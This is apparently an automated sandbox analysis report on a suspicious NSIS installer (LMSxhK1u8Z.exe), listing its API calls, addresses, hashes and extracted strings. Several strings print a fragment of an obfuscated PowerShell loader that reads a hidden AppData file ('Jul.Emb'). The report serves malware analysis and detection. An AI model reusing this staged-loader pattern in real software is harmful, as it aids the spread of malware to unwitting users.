                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033C2
                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004033D3
                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
                                                                                                • DeleteFileW.KERNELBASE(1033), ref: 004033EF
                                                                                                • OleUninitialize.OLE32(?), ref: 0040349F
                                                                                                • ExitProcess.KERNEL32 ref: 004034BF
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\LMSxhK1u8Z.exe",00000000,?), ref: 004034CB
                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\LMSxhK1u8Z.exe",00000000,?), ref: 004034D7
                                                                                                • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004034E3
                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004034EA
                                                                                                • DeleteFileW.KERNEL32(0042A9B8,0042A9B8,?,"$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets,?), ref: 00403544
                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\LMSxhK1u8Z.exe,0042A9B8,00000001), ref: 00403558
                                                                                                • CloseHandle.KERNEL32(00000000,0042A9B8,0042A9B8,?,0042A9B8,00000000), ref: 00403585
                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 004035DB
                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403617
                                                                                                • ExitProcess.KERNEL32 ref: 0040363A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                • String ID: "$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets$"C:\Users\user\Desktop\LMSxhK1u8Z.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Hendecasyllabic$C:\Users\user\Desktop$C:\Users\user\Desktop\LMSxhK1u8Z.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                • API String ID: 4107622049-1429106303
                                                                                                • Opcode ID: abc994cbbed28e5ab2df900e3bd2d261610db15ed8f53fee5a5c2c0b050c2c29
                                                                                                • Instruction ID: c3dce8018812ee6b76f8874dd062ed99eac1b1b1f1b1a27a2229326af738bb6a
                                                                                                • Opcode Fuzzy Hash: abc994cbbed28e5ab2df900e3bd2d261610db15ed8f53fee5a5c2c0b050c2c29
                                                                                                • Instruction Fuzzy Hash: 21B1C230500311AAD720BF619D49A2B3EACEF45746F11443FF442BA2E1DBBD9A45CB6E

                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,00000403), ref: 00405198
                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004051A7
                                                                                                • GetClientRect.USER32(?,?), ref: 004051E4
                                                                                                • GetSystemMetrics.USER32(00000015), ref: 004051EC
                                                                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 0040520D
                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040521E
                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405231
                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040523F
                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405252
                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405274
                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405288
                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004052A9
                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004052B9
                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052D2
                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052DE
                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 004051B6
                                                                                                  • Part of subcall function 00403FCA: SendMessageW.USER32(00000028,?,00000001,00403DF6), ref: 00403FD8
                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004052FB
                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_000050CD,00000000), ref: 00405309
                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 00405310
                                                                                                • ShowWindow.USER32(00000000), ref: 00405334
                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405339
                                                                                                • ShowWindow.USER32(00000008), ref: 00405380
                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B2
                                                                                                • CreatePopupMenu.USER32 ref: 004053C3
                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053D8
                                                                                                • GetWindowRect.USER32(?,?), ref: 004053EB
                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040540F
                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040544A
                                                                                                • OpenClipboard.USER32(00000000), ref: 0040545A
                                                                                                • EmptyClipboard.USER32 ref: 00405460
                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040546C
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405476
                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040548A
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004054AA
                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004054B5
                                                                                                • CloseClipboard.USER32 ref: 004054BB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                • String ID: {
                                                                                                • API String ID: 590372296-366298937
                                                                                                • Opcode ID: 6a257b260a3b0c83269dcddb951c3defeee43ec038cce651daa15833628ad7d2
                                                                                                • Instruction ID: 772e8fb2bc22c5523386e43e2fe12f7b772d85fac993704a731418f1505fe185
                                                                                                • Opcode Fuzzy Hash: 6a257b260a3b0c83269dcddb951c3defeee43ec038cce651daa15833628ad7d2
                                                                                                • Instruction Fuzzy Hash: A8A14871800609FFDB119F60DD89AAE7B79FF08355F00403AFA45BA1A0CBB59A51DF58

                                                                                                Control-flow Graph

[Control-flow graph of the routine starting at 00405D68; graph image not reproduced]
                                                                                                APIs
                                                                                                • GetVersion.KERNEL32(00000000,Frisurens,?,00405031,Frisurens,00000000,00000000,0041C0DD), ref: 00405E2B
                                                                                                • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00405EA9
                                                                                                • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 00405EBC
                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405EF8
                                                                                                • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00405F06
                                                                                                • CoTaskMemFree.OLE32(?), ref: 00405F11
                                                                                                • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F35
                                                                                                • lstrlenW.KERNEL32(: Completed,00000000,Frisurens,?,00405031,Frisurens,00000000,00000000,0041C0DD), ref: 00405F8F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                • String ID: "$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets$: Completed$Frisurens$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                • API String ID: 900638850-282594308
                                                                                                • Opcode ID: 22fe4a5b293e7964b16035e555f953c0a2e3a01ea996a2207c843cdd348733b1
                                                                                                • Instruction ID: b81ff5d6b4e7f68ebbf9f5a60334f295c7cfdbca171d810927ba552bda20cf23
                                                                                                • Opcode Fuzzy Hash: 22fe4a5b293e7964b16035e555f953c0a2e3a01ea996a2207c843cdd348733b1
                                                                                                • Instruction Fuzzy Hash: E761C071A00906ABDF209F25CD45AAF37A5EF55314F14803BE585BA2E0D77D8A82CF8D

                                                                                                Control-flow Graph

[Control-flow graph of the routine starting at 004055D5; graph image not reproduced]
                                                                                                APIs
                                                                                                • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\LMSxhK1u8Z.exe"), ref: 004055FE
                                                                                                • lstrcatW.KERNEL32(0042F200,\*.*,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\LMSxhK1u8Z.exe"), ref: 00405646
                                                                                                • lstrcatW.KERNEL32(?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\LMSxhK1u8Z.exe"), ref: 00405669
                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\LMSxhK1u8Z.exe"), ref: 0040566F
                                                                                                • FindFirstFileW.KERNEL32(0042F200,?,?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\LMSxhK1u8Z.exe"), ref: 0040567F
                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,?,?,0000003F), ref: 00405733
                                                                                                • FindClose.KERNEL32(00000000), ref: 00405744
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004055E3
                                                                                                • "C:\Users\user\Desktop\LMSxhK1u8Z.exe", xrefs: 004055DE
                                                                                                • \*.*, xrefs: 00405640
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                • String ID: "C:\Users\user\Desktop\LMSxhK1u8Z.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                • API String ID: 2035342205-2774318742
                                                                                                • Opcode ID: 47c12af7b891abb2e5cafb38bce86d44a40b8918cc5e8908534289e066a9b85e
                                                                                                • Instruction ID: 4fa580f458b6ccb0767a7c3d42ea348ba32fb6fd56c90456328cf5468defc57c
                                                                                                • Opcode Fuzzy Hash: 47c12af7b891abb2e5cafb38bce86d44a40b8918cc5e8908534289e066a9b85e
                                                                                                • Instruction Fuzzy Hash: 8A51B135800A05EACB21AB218C85ABF7778EF81754F54843BF415B61D1E77C4982EE6D
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                                                                • LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                • String ID:
                                                                                                • API String ID: 310444273-0
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNELBASE(?,00430248,0042FA00,004058FF,0042FA00,0042FA00,00000000,0042FA00,0042FA00,?,?,74DF3420,004055F5,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00406094
                                                                                                • FindClose.KERNELBASE(00000000), ref: 004060A0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFileFirst
                                                                                                • String ID:
                                                                                                • API String ID: 2295610775-0

                                                                                                Control-flow Graph (legend: Executed / Not Executed), first listed block 40371a-403732
                                                                                                APIs
                                                                                                  • Part of subcall function 004060B0: GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                                                                  • Part of subcall function 004060B0: LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                                                                  • Part of subcall function 004060B0: GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                                                                • lstrcatW.KERNEL32(1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000,"C:\Users\user\Desktop\LMSxhK1u8Z.exe"), ref: 0040379B
                                                                                                • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 0040381B
                                                                                                • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000), ref: 0040382E
                                                                                                • GetFileAttributesW.KERNEL32(: Completed), ref: 00403839
                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken), ref: 00403882
                                                                                                  • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                                                                • RegisterClassW.USER32(00433E40), ref: 004038BF
                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004038D7
                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040390C
                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403942
                                                                                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403953
                                                                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 0040395E
                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20A,00433E40), ref: 0040396E
                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00433E40), ref: 0040397B
                                                                                                • RegisterClassW.USER32(00433E40), ref: 00403984
                                                                                                • DialogBoxParamW.USER32(?,00000000,00403ABD,00000000), ref: 004039A3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                • String ID: "C:\Users\user\Desktop\LMSxhK1u8Z.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$@>C$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                • API String ID: 914957316-1433671342

                                                                                                Control-flow Graph (legend: Executed / Not Executed), first listed block 403abd-403acf
                                                                                                APIs
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403AF9
                                                                                                • ShowWindow.USER32(?), ref: 00403B16
                                                                                                • DestroyWindow.USER32 ref: 00403B2A
                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403B46
                                                                                                • GetDlgItem.USER32(?,?), ref: 00403B67
                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403B7B
                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403B82
                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403C30
                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403C3A
                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403C54
                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403CA5
                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403D4B
                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403D6C
                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D7E
                                                                                                • EnableWindow.USER32(?,?), ref: 00403D99
                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DAF
                                                                                                • EnableMenuItem.USER32(00000000), ref: 00403DB6
                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403DCE
                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403DE1
                                                                                                • lstrlenW.KERNEL32(0042D1F8,?,0042D1F8,00433EA0), ref: 00403E0A
                                                                                                • SetWindowTextW.USER32(?,0042D1F8), ref: 00403E1E
                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00403F52
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 3282139019-0

                                                                                                Control-flow Graph (legend: Executed / Not Executed), first listed block 402cff-402d4d
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 00402D10
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\LMSxhK1u8Z.exe,00000400,?,?,?,00000000,004033FE,?), ref: 00402D2C
                                                                                                  • Part of subcall function 004059CF: GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\LMSxhK1u8Z.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                                                                  • Part of subcall function 004059CF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\LMSxhK1u8Z.exe,C:\Users\user\Desktop\LMSxhK1u8Z.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 00402D78
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                • String ID: "C:\Users\user\Desktop\LMSxhK1u8Z.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\LMSxhK1u8Z.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                • API String ID: 4283519449-2839437641
                                                                                                • Opcode ID: 8f28a7fd6c0e7d3444f95869c0558a3ff55555bbefce27c9d00e146f9aea9c7c
                                                                                                • Instruction ID: 77e1e34d23ec3cd6b8d0d5fd72658ee77a79da899d912ccb87991cca2eeb2408
                                                                                                • Opcode Fuzzy Hash: 8f28a7fd6c0e7d3444f95869c0558a3ff55555bbefce27c9d00e146f9aea9c7c
                                                                                                • Instruction Fuzzy Hash: 0051D471944218AFDB109F65DE89B9F7AB8FB14358F10403BFA04B62D0C7B89D418B9D

                                                                                                Control-flow Graph

                                                                                                [Graph image not reproduced; first basic block 401752-401777. Legend: Executed / Not Executed.]
                                                                                                APIs
                                                                                                • lstrcatW.KERNEL32(00000000,00000000,Generic,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Hendecasyllabic,?,?,00000031), ref: 00401793
                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Generic,Generic,00000000,00000000,Generic,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Hendecasyllabic,?,?,00000031), ref: 004017B8
                                                                                                  • Part of subcall function 00405D46: lstrcpynW.KERNEL32(?,?,00000400,0040324B,00433EA0,NSIS Error), ref: 00405D53
                                                                                                  • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                                                                  • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                                                                  • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,74DF23A0), ref: 00405055
                                                                                                  • Part of subcall function 00404FFA: SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
                                                                                                  • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                                                                  • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                                                                  • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                • String ID: C:\Program Files (x86)\edelweissen\romanblade.ini$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Hendecasyllabic$Generic$Heteric
                                                                                                • API String ID: 1941528284-2039653899
                                                                                                • Opcode ID: c41d853cd82c4e4dfdb8920349454b92991ee92d33bc5413693936f55365b64f
                                                                                                • Instruction ID: d3e4dca81327e3df0df284c572be3abc4bccaf2f3cb66fe1cef89d7a827d5624
                                                                                                • Opcode Fuzzy Hash: c41d853cd82c4e4dfdb8920349454b92991ee92d33bc5413693936f55365b64f
                                                                                                • Instruction Fuzzy Hash: 9B419171900505BBCF10BBB5DC8ADAF3665EF06369B20823BF012B11E1D63C8A519A6D

                                                                                                Control-flow Graph

                                                                                                [Graph image not reproduced; first basic block 402f38-402f51. Legend: Executed / Not Executed.]
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 00402FA3
                                                                                                • GetTickCount.KERNEL32 ref: 00403048
                                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403071
                                                                                                • wsprintfW.USER32 ref: 00403084
                                                                                                • WriteFile.KERNELBASE(00000000,00000000,0041C0DD,00402ED2,00000000), ref: 004030B5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CountTick$FileWritewsprintf
                                                                                                • String ID: ... %d%%$znA
                                                                                                • API String ID: 4209647438-2447772013
                                                                                                • Opcode ID: 61ddf02fd636ed85020eb85095074430f0604a488243a9e3d908ba4f2f9dd09b
                                                                                                • Instruction ID: 34a6cf203725df572fb249859d8c599c0d8718bcf9279d6af528d8a937ec08d1
                                                                                                • Opcode Fuzzy Hash: 61ddf02fd636ed85020eb85095074430f0604a488243a9e3d908ba4f2f9dd09b
                                                                                                • Instruction Fuzzy Hash: 53617B71901219EBCB10DFA5DA4469F7FB8AF08355F10453BE914BB2C0D7789E40DBA9

                                                                                                Control-flow Graph

                                                                                                [Graph image not reproduced; first basic block 404ffa-40500f. Legend: Executed / Not Executed.]
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                                                                • lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                                                                • lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,74DF23A0), ref: 00405055
                                                                                                • SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                • String ID: Frisurens
                                                                                                • API String ID: 2531174081-3121014363
                                                                                                • Opcode ID: 671efdfc4b123df1b42670911b49c5f72c5e00122fc07205780e32bafcf4a041
                                                                                                • Instruction ID: 2c8a209b838051fcdbb8fb1d9598827595890bd21b84812adf7dff8cdb9255f5
                                                                                                • Opcode Fuzzy Hash: 671efdfc4b123df1b42670911b49c5f72c5e00122fc07205780e32bafcf4a041
                                                                                                • Instruction Fuzzy Hash: E1216071900618BADB219F65DD859DFBFB9EF45750F14803AF904B62A0C3794A40CF98

                                                                                                Control-flow Graph

                                                                                                [Graph image not reproduced; first basic block 4015b9-4015cd. Legend: Executed / Not Executed.]
                                                                                                APIs
                                                                                                  • Part of subcall function 00405859: CharNextW.USER32(?,?,0042FA00,?,004058CD,0042FA00,0042FA00,?,?,74DF3420,004055F5,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\LMSxhK1u8Z.exe"), ref: 00405867
                                                                                                  • Part of subcall function 00405859: CharNextW.USER32(00000000), ref: 0040586C
                                                                                                  • Part of subcall function 00405859: CharNextW.USER32(00000000), ref: 00405884
                                                                                                • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Hendecasyllabic,?,00000000,000000F0), ref: 00401630
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Hendecasyllabic, xrefs: 00401623
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmp
